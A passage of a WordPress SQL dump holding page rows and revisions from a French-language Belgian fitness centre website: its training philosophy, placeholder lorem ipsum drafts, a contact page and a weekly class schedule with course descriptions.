(5, 1, '2013-05-23 18:12:51', '2013-05-23 18:12:51', '<blockquote>\r\n<h2>Bien plus qu\'une simple activité physique, le cross training center vous propose une approche unique faisant intervenir l\'alimentation et la gestion du stress, tout en vous proposant un entraînement de qualité.</h2>\r\n&nbsp;</blockquote>\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px; width: 320px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"alignnone size-medium wp-image-102\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x77.png\" width=\"300\" height=\"77\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Assurer un entraînement de qualité :</h1>\r\nSelon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : récupérer, prévenir et améliorer. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assurée.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px; width: 320px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2.png\"><img class=\"alignnone size-medium wp-image-103\" alt=\"picto2\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2-291x300.png\" width=\"291\" height=\"300\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Une approche globale</h1>\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p style=\"text-align: center;\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>', 'Notre Philosophie', '', 'publish', 'closed', 'open', '', 'notre-philosophie', '', '', '2013-11-04 16:47:48', '2013-11-04 16:47:48', '', 0, 'http://www.crosstrainingcenter.be/?page_id=5', 0, 'page', '', 0),
(6, 1, '2013-05-23 18:10:53', '2013-05-23 18:10:53', '', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-05-23 18:10:53', '2013-05-23 18:10:53', '', 5, 'http://www.crosstrainingcenter.be/?p=6', 0, 'revision', '', 0),
(35, 1, '2013-08-23 08:48:48', '2013-08-23 08:48:48', '<blockquote>\n<h2>Bien plus qu\'une simple activité physique, le cross training center de Namur vous propose une approche unique faisant intervenir l\'alimentation et la gestion du stress, tout en vous proposant un entraînement de qualité.</h2>\n&nbsp;</blockquote>\n<div class=\"arrondi\">\n<table style=\"border: 1px; width: 100%;\">\n<tbody>\n<tr>\n<td style=\"border: 0px; padding: 5px; width: 320px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"alignnone size-medium wp-image-102\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x77.png\" width=\"300\" height=\"77\" /></a></td>\n<td style=\"border: 0px; padding: 5px;\">\n<h1>Assurer un entraînement de qualité :</h1>\nSelon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : récupérer, prévenir et améliorer. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assurée.</td>\n</tr>\n</tbody>\n</table>\n</div>\n&nbsp;\n<div class=\"arrondi\">\n<table style=\"border: 1px; width: 100%;\">\n<tbody>\n<tr>\n<td style=\"border: 0px; padding: 5px; width: 320px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2.png\"><img class=\"alignnone size-medium wp-image-103\" alt=\"picto2\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2-291x300.png\" width=\"291\" height=\"300\" /></a></td>\n<td style=\"border: 0px; padding: 5px;\">\n<h1>Une approche globale</h1>\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\n<p style=\"text-align: center;\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\n\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\n\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\n\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.</td>\n</tr>\n</tbody>\n</table>\n</div>', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-autosave-v1', '', '', '2013-08-23 08:48:48', '2013-08-23 08:48:48', '', 5, 'http://www.crosstrainingcenter.be/?p=35', 0, 'revision', '', 0),
(36, 1, '2013-06-13 16:24:45', '2013-06-13 16:24:45', 'Selon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle, en privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis. Ce dosage subtil définit la qualité de l\'entraînement. Ces 3 buts sont :\r\n<p align=\"center\"><b>PREVENIR</b> – <b>AMELIORER</b> – <b>RECUPERER</b>.</p>\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p align=\"center\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-06-13 16:24:45', '2013-06-13 16:24:45', '', 5, 'http://www.crosstrainingcenter.be/?p=36', 0, 'revision', '', 0),
(37, 1, '2013-05-24 14:36:30', '2013-05-24 14:36:30', '<i>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed non risus. Suspendisse lectus tortor, dignissim sit amet, adipiscing nec, ultricies sed, dolor. Cras elementum ultrices diam. Maecenas ligula massa, varius a, semper congue, euismod non, mi. Proin porttitor, orci nec nonummy molestie, enim est eleifend mi, non fermentum diam nisl sit amet erat. Duis semper. Duis arcu massa, scelerisque vitae, consequat in, pretium a, enim. Pellentesque congue. Ut in risus volutpat libero pharetra tempor. Cras vestibulum bibendum augue. Praesent egestas leo in pede. Praesent blandit odio eu enim. Pellentesque sed dui ut augue blandit sodales. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Aliquam nibh. Mauris ac mauris sed pede pellentesque fermentum. Maecenas adipiscing ante non diam sodales hendrerit.</i> <i>Ut velit mauris, egestas sed, gravida nec, ornare ut, mi. Aenean ut orci vel massa suscipit pulvinar. Nulla sollicitudin. Fusce varius, ligula non tempus aliquam, nunc turpis ullamcorper nibh, in tempus sapien eros vitae ligula. Pellentesque rhoncus nunc et augue. Integer id felis. Curabitur aliquet pellentesque diam. Integer quis metus vitae elit lobortis egestas. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Morbi vel erat non mauris convallis vehicula. Nulla et sapien. Integer tortor tellus, aliquam faucibus, convallis id, congue eu, quam. Mauris ullamcorper felis vitae erat. Proin feugiat, augue non elementum posuere, metus purus iaculis lectus, et tristique ligula justo vitae magna.</i> <i>Aliquam convallis sollicitudin purus. Praesent aliquam, enim at fermentum mollis, ligula massa adipiscing nisl, ac euismod nibh nisl eu lectus. Fusce vulputate sem at sapien. Vivamus leo. Aliquam euismod libero eu enim. Nulla nec felis sed leo placerat imperdiet. Aenean suscipit nulla in justo. Suspendisse cursus rutrum augue. Nulla tincidunt tincidunt mi. Curabitur iaculis, lorem vel rhoncus faucibus, felis magna fermentum augue, et ultricies lacus lorem varius purus. Curabitur eu amet.</i><i>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed non risus. Suspendisse lectus tortor, dignissim sit amet, adipiscing nec, ultricies sed, dolor. Cras elementum ultrices diam. Maecenas ligula massa, varius a, semper congue, euismod non, mi. Proin porttitor, orci nec nonummy molestie, enim est eleifend mi, non fermentum diam nisl sit amet erat. Duis semper. Duis arcu massa, scelerisque vitae, consequat in, pretium a, enim. Pellentesque congue. Ut in risus volutpat libero pharetra tempor. Cras vestibulum bibendum augue. Praesent egestas leo in pede. Praesent blandit odio eu enim. Pellentesque sed dui ut augue blandit sodales. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Aliquam nibh. Mauris ac mauris sed pede pellentesque fermentum. Maecenas adipiscing ante non diam sodales hendrerit.</i> <i>Ut velit mauris, egestas sed, gravida nec, ornare ut, mi. Aenean ut orci vel massa suscipit pulvinar. Nulla sollicitudin. Fusce varius, ligula non tempus aliquam, nunc turpis ullamcorper nibh, in tempus sapien eros vitae ligula. Pellentesque rhoncus nunc et augue. Integer id felis. Curabitur aliquet pellentesque diam. Integer quis metus vitae elit lobortis egestas. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Morbi vel erat non mauris convallis vehicula. Nulla et sapien. Integer tortor tellus, aliquam faucibus, convallis id, congue eu, quam. Mauris ullamcorper felis vitae erat. Proin feugiat, augue non elementum posuere, metus purus iaculis lectus, et tristique ligula justo vitae magna.</i> <i>Aliquam convallis sollicitudin purus. Praesent aliquam, enim at fermentum mollis, ligula massa adipiscing nisl, ac euismod nibh nisl eu lectus. Fusce vulputate sem at sapien. Vivamus leo. Aliquam euismod libero eu enim. Nulla nec felis sed leo placerat imperdiet. Aenean suscipit nulla in justo. Suspendisse cursus rutrum augue. Nulla tincidunt tincidunt mi. Curabitur iaculis, lorem vel rhoncus faucibus, felis magna fermentum augue, et ultricies lacus lorem varius purus. Curabitur eu amet.</i><i>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed non risus. Suspendisse lectus tortor, dignissim sit amet, adipiscing nec, ultricies sed, dolor. Cras elementum ultrices diam. Maecenas ligula massa, varius a, semper congue, euismod non, mi. Proin porttitor, orci nec nonummy molestie, enim est eleifend mi, non fermentum diam nisl sit amet erat. Duis semper. Duis arcu massa, scelerisque vitae, consequat in, pretium a, enim. Pellentesque congue. Ut in risus volutpat libero pharetra tempor. Cras vestibulum bibendum augue. Praesent egestas leo in pede. Praesent blandit odio eu enim. Pellentesque sed dui ut augue blandit sodales. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Aliquam nibh. Mauris ac mauris sed pede pellentesque fermentum. Maecenas adipiscing ante non diam sodales hendrerit.</i> <i>Ut velit mauris, egestas sed, gravida nec, ornare ut, mi. Aenean ut orci vel massa suscipit pulvinar. Nulla sollicitudin. Fusce varius, ligula non tempus aliquam, nunc turpis ullamcorper nibh, in tempus sapien eros vitae ligula. Pellentesque rhoncus nunc et augue. Integer id felis. Curabitur aliquet pellentesque diam. Integer quis metus vitae elit lobortis egestas. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Morbi vel erat non mauris convallis vehicula. Nulla et sapien. Integer tortor tellus, aliquam faucibus, convallis id, congue eu, quam. Mauris ullamcorper felis vitae erat. Proin feugiat, augue non elementum posuere, metus purus iaculis lectus, et tristique ligula justo vitae magna.</i> <i>Aliquam convallis sollicitudin purus. Praesent aliquam, enim at fermentum mollis, ligula massa adipiscing nisl, ac euismod nibh nisl eu lectus. Fusce vulputate sem at sapien. Vivamus leo. Aliquam euismod libero eu enim. Nulla nec felis sed leo placerat imperdiet. Aenean suscipit nulla in justo. Suspendisse cursus rutrum augue. Nulla tincidunt tincidunt mi. Curabitur iaculis, lorem vel rhoncus faucibus, felis magna fermentum augue, et ultricies lacus lorem varius purus. Curabitur eu amet.</i><i>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed non risus. Suspendisse lectus tortor, dignissim sit amet, adipiscing nec, ultricies sed, dolor. Cras elementum ultrices diam. Maecenas ligula massa, varius a, semper congue, euismod non, mi. Proin porttitor, orci nec nonummy molestie, enim est eleifend mi, non fermentum diam nisl sit amet erat. Duis semper. Duis arcu massa, scelerisque vitae, consequat in, pretium a, enim. Pellentesque congue. Ut in risus volutpat libero pharetra tempor. Cras vestibulum bibendum augue. Praesent egestas leo in pede. Praesent blandit odio eu enim. Pellentesque sed dui ut augue blandit sodales. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Aliquam nibh. Mauris ac mauris sed pede pellentesque fermentum. Maecenas adipiscing ante non diam sodales hendrerit.</i> <i>Ut velit mauris, egestas sed, gravida nec, ornare ut, mi. Aenean ut orci vel massa suscipit pulvinar. Nulla sollicitudin. Fusce varius, ligula non tempus aliquam, nunc turpis ullamcorper nibh, in tempus sapien eros vitae ligula. Pellentesque rhoncus nunc et augue. Integer id felis. Curabitur aliquet pellentesque diam. Integer quis metus vitae elit lobortis egestas. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Morbi vel erat non mauris convallis vehicula. Nulla et sapien. Integer tortor tellus, aliquam faucibus, convallis id, congue eu, quam. Mauris ullamcorper felis vitae erat. Proin feugiat, augue non elementum posuere, metus purus iaculis lectus, et tristique ligula justo vitae magna.</i> <i>Aliquam convallis sollicitudin purus. Praesent aliquam, enim at fermentum mollis, ligula massa adipiscing nisl, ac euismod nibh nisl eu lectus. Fusce vulputate sem at sapien. Vivamus leo. Aliquam euismod libero eu enim. Nulla nec felis sed leo placerat imperdiet. Aenean suscipit nulla in justo. Suspendisse cursus rutrum augue. Nulla tincidunt tincidunt mi. Curabitur iaculis, lorem vel rhoncus faucibus, felis magna fermentum augue, et ultricies lacus lorem varius purus. Curabitur eu amet.</i>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-05-24 14:36:30', '2013-05-24 14:36:30', '', 11, 'http://www.crosstrainingcenter.be/?p=37', 0, 'revision', '', 0),
(8, 1, '2013-05-23 18:11:16', '2013-05-23 18:11:16', '<i>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed non risus. Suspendisse lectus tortor, dignissim sit amet, adipiscing nec, ultricies sed, dolor. Cras elementum ultrices diam. Maecenas ligula massa, varius a, semper congue, euismod non, mi. Proin porttitor, orci nec nonummy molestie, enim est eleifend mi, non fermentum diam nisl sit amet erat. Duis semper. Duis arcu massa, scelerisque vitae, consequat in, pretium a, enim. Pellentesque congue. Ut in risus volutpat libero pharetra tempor. Cras vestibulum bibendum augue. Praesent egestas leo in pede. Praesent blandit odio eu enim. Pellentesque sed dui ut augue blandit sodales. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Aliquam nibh. Mauris ac mauris sed pede pellentesque fermentum. Maecenas adipiscing ante non diam sodales hendrerit.</i> <i>Ut velit mauris, egestas sed, gravida nec, ornare ut, mi. Aenean ut orci vel massa suscipit pulvinar. Nulla sollicitudin. Fusce varius, ligula non tempus aliquam, nunc turpis ullamcorper nibh, in tempus sapien eros vitae ligula. Pellentesque rhoncus nunc et augue. Integer id felis. Curabitur aliquet pellentesque diam. Integer quis metus vitae elit lobortis egestas. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Morbi vel erat non mauris convallis vehicula. Nulla et sapien. Integer tortor tellus, aliquam faucibus, convallis id, congue eu, quam. Mauris ullamcorper felis vitae erat. Proin feugiat, augue non elementum posuere, metus purus iaculis lectus, et tristique ligula justo vitae magna.</i> <i>Aliquam convallis sollicitudin purus. Praesent aliquam, enim at fermentum mollis, ligula massa adipiscing nisl, ac euismod nibh nisl eu lectus. Fusce vulputate sem at sapien. Vivamus leo. Aliquam euismod libero eu enim. Nulla nec felis sed leo placerat imperdiet. Aenean suscipit nulla in justo. Suspendisse cursus rutrum augue. Nulla tincidunt tincidunt mi. Curabitur iaculis, lorem vel rhoncus faucibus, felis magna fermentum augue, et ultricies lacus lorem varius purus. Curabitur eu amet.</i>\r\n\r\n<i>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed non risus. Suspendisse lectus tortor, dignissim sit amet, adipiscing nec, ultricies sed, dolor. Cras elementum ultrices diam. Maecenas ligula massa, varius a, semper congue, euismod non, mi. Proin porttitor, orci nec nonummy molestie, enim est eleifend mi, non fermentum diam nisl sit amet erat. Duis semper. Duis arcu massa, scelerisque vitae, consequat in, pretium a, enim. Pellentesque congue. Ut in risus volutpat libero pharetra tempor. Cras vestibulum bibendum augue. Praesent egestas leo in pede. Praesent blandit odio eu enim. Pellentesque sed dui ut augue blandit sodales. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Aliquam nibh. Mauris ac mauris sed pede pellentesque fermentum. Maecenas adipiscing ante non diam sodales hendrerit.</i> <i>Ut velit mauris, egestas sed, gravida nec, ornare ut, mi. Aenean ut orci vel massa suscipit pulvinar. Nulla sollicitudin. Fusce varius, ligula non tempus aliquam, nunc turpis ullamcorper nibh, in tempus sapien eros vitae ligula. Pellentesque rhoncus nunc et augue. Integer id felis. Curabitur aliquet pellentesque diam. Integer quis metus vitae elit lobortis egestas. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Morbi vel erat non mauris convallis vehicula. Nulla et sapien. Integer tortor tellus, aliquam faucibus, convallis id, congue eu, quam. Mauris ullamcorper felis vitae erat. Proin feugiat, augue non elementum posuere, metus purus iaculis lectus, et tristique ligula justo vitae magna.</i> <i>Aliquam convallis sollicitudin purus. Praesent aliquam, enim at fermentum mollis, ligula massa adipiscing nisl, ac euismod nibh nisl eu lectus. Fusce vulputate sem at sapien. Vivamus leo. Aliquam euismod libero eu enim. Nulla nec felis sed leo placerat imperdiet. Aenean suscipit nulla in justo. Suspendisse cursus rutrum augue. Nulla tincidunt tincidunt mi. Curabitur iaculis, lorem vel rhoncus faucibus, felis magna fermentum augue, et ultricies lacus lorem varius purus. Curabitur eu amet.</i>\r\n\r\n<i>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed non risus. Suspendisse lectus tortor, dignissim sit amet, adipiscing nec, ultricies sed, dolor. Cras elementum ultrices diam. Maecenas ligula massa, varius a, semper congue, euismod non, mi. Proin porttitor, orci nec nonummy molestie, enim est eleifend mi, non fermentum diam nisl sit amet erat. Duis semper. Duis arcu massa, scelerisque vitae, consequat in, pretium a, enim. Pellentesque congue. Ut in risus volutpat libero pharetra tempor. Cras vestibulum bibendum augue. Praesent egestas leo in pede. Praesent blandit odio eu enim. Pellentesque sed dui ut augue blandit sodales. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Aliquam nibh. Mauris ac mauris sed pede pellentesque fermentum. Maecenas adipiscing ante non diam sodales hendrerit.</i> <i>Ut velit mauris, egestas sed, gravida nec, ornare ut, mi. Aenean ut orci vel massa suscipit pulvinar. Nulla sollicitudin. Fusce varius, ligula non tempus aliquam, nunc turpis ullamcorper nibh, in tempus sapien eros vitae ligula. Pellentesque rhoncus nunc et augue. Integer id felis. Curabitur aliquet pellentesque diam. Integer quis metus vitae elit lobortis egestas. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Morbi vel erat non mauris convallis vehicula. Nulla et sapien. Integer tortor tellus, aliquam faucibus, convallis id, congue eu, quam. Mauris ullamcorper felis vitae erat. Proin feugiat, augue non elementum posuere, metus purus iaculis lectus, et tristique ligula justo vitae magna.</i> <i>Aliquam convallis sollicitudin purus. Praesent aliquam, enim at fermentum mollis, ligula massa adipiscing nisl, ac euismod nibh nisl eu lectus. Fusce vulputate sem at sapien. Vivamus leo. Aliquam euismod libero eu enim. Nulla nec felis sed leo placerat imperdiet. Aenean suscipit nulla in justo. Suspendisse cursus rutrum augue. Nulla tincidunt tincidunt mi. Curabitur iaculis, lorem vel rhoncus faucibus, felis magna fermentum augue, et ultricies lacus lorem varius purus. Curabitur eu amet.</i>', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-05-23 18:11:16', '2013-05-23 18:11:16', '', 5, 'http://www.crosstrainingcenter.be/?p=8', 0, 'revision', '', 0),
(9, 1, '2013-05-23 18:13:57', '2013-05-23 18:13:57', '<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; width: 50%;\">\r\n<h1>Prise de RDV :</h1>\r\nLes prises de RDV pour les séances de\r\nTeam Training, Duo Training, Personnal\r\nTraining ou Coaching nutritionnel se\r\nfont exclusivement par téléphone.\r\n\r\n0485 / 92 . 02 . 12\r\n<h1></h1>\r\n<h1>Adresse :</h1>\r\nBowling et Squash de Namur\r\nChaussée de Perwez 251\r\n<em id=\"__mceDel\"> 5002 Namur\r\n<a href=\"mailto:info@crosstrainingcenter.be\">info@crosstrainingcenter.be</a></em></td>\r\n<td style=\"border: 0px; width: 50%;\">\r\n<h1>Plan d\'accès :</h1>\r\n<iframe src=\"https://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+namur&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002&amp;gl=be&amp;t=m&amp;ll=50.4846,4.849863&amp;spn=0.016384,0.025749&amp;z=14&amp;output=embed\" height=\"300\" width=\"300\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"></iframe>\r\n<small><a style=\"color: #0000ff; text-align: left;\" href=\"https://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+namur&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002&amp;gl=be&amp;t=m&amp;ll=50.4846,4.849863&amp;spn=0.016384,0.025749&amp;z=14&amp;source=embed\">Agrandir le plan</a></small></td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h1>Laissez-nous un message :</h1>\r\n[contact-form-7 id=\"257\" title=\"Contact form 1\"]</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Contact - Namur', '', 'trash', 'closed', 'open', '', 'contact', '', '', '2013-11-03 10:19:12', '2013-11-03 10:19:12', '', 0, 'http://www.crosstrainingcenter.be/?page_id=9', 0, 'page', '', 0),
(10, 1, '2013-05-23 18:13:13', '2013-05-23 18:13:13', '', 'Contact', '', 'inherit', 'open', 'open', '', '9-revision-v1', '', '', '2013-05-23 18:13:13', '2013-05-23 18:13:13', '', 9, 'http://www.crosstrainingcenter.be/?p=10', 0, 'revision', '', 0),
(11, 1, '2013-05-23 18:14:55', '2013-05-23 18:14:55', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nNamur\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Limelette\" href=\"http://www2.crosstrainingcenter.be/les-seances-limelette/\">Limelette</a>\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1></h1>\r\n<h1>Team Training - Namur :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>18h</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>17h30</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>18h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>17h30</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>17h30</b>\r\nTRX</td>\r\n<td class=\"ttrx\"><b>11h</b>\r\nTRX</td>\r\n<td class=\"tglfe\"><b>11h</b>\r\nGLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tglfe\"><b>18h30</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>18h15</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>18h30</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>18h15</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>18h15</b>\r\nGLFE</td>\r\n<td class=\"tglfe\"><b>11h30</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>11h30</b>\r\nTRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"trip\"><b>19h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>19h</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>19h</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>19h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"trip\"><b>12h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tcardio\"><b>12h</b>\r\nCARDIO</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tcardio\"><b>19h45</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>19h30</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h45</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>19h15</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>19h45</b>\r\nCARDIO</td>\r\n<td class=\"tcellule\"></td>\r\n<td class=\"tcellule\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<span style=\"text-decoration: underline; background: #F2F5A9;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background: #E6E6E6;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5A9;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5F2;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids 